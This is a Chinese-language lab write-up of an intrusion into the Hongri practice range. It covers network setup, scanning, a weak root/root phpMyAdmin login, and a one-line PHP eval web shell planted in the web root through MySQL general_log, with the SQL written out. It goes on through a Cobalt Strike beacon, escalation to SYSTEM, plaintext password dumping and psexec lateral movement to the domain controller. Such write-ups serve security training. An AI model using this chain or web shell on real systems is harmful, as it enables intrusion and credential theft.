红日靶场渗透记录(一)
首先是配置虚拟机的网络
这里需要新建一张192.168.52.0/24
网段的仅主机网卡
一台域成员和一台域控处于内网,直接将虚拟网卡设置为仅主机就可以了
但是web服务器则是同时处于内网和外网,正常情况下本地做只需要把网络适配器
设置成仅主机,然后网络适配器2
设置为NAT就行了,但我这是在实验室的一台服务器上搭的,所以网络适配器2
需要设置成桥接模式,然后配置到实验室局域网的网段
需要注意的是网络适配器
是静态ip,网络适配器2
是DHCP,所以顺序不能搞反,别问我怎么知道的;w;
然后只需要将win7的phpstudy打开就可以访问web服务了
先用nmap扫一下
然后查看一下web服务,是个php探针,可以看到phpstudy的路径是C:/phpStudy/WWW
再用dirsearch一扫,有个phpmyadmin
是个弱口令,账户密码都是root
查看日志信息,日志是关的
1 | SHOW VARIABLES LIKE '%general%' |
把日志打开
1 | SET GLOBAL general_log='on'; |
更改日志输出位置
1 | set global general_log_file = 'C:/phpStudy/WWW/a.php' |
上马
1 | SELECT '<?php @eval($_POST["a"]);?>' |
蚁剑连接
开启cs4.5
*cs4.8生成的马子和这台老旧的靶机不兼容*
创建监听器,生成木马
通过蚁剑上传木马,运行
成功上线
然后浅浅提个权
成功提升到SYSTEM权限,
然后再探测一下192.168.52.0网段的其他主机
利用SYSTEM权限抓取一下明文密码
之后再创建一个SMB的监听器,通过psexec横向移动拿下域控制器
再通过域控制器横移拿下域成员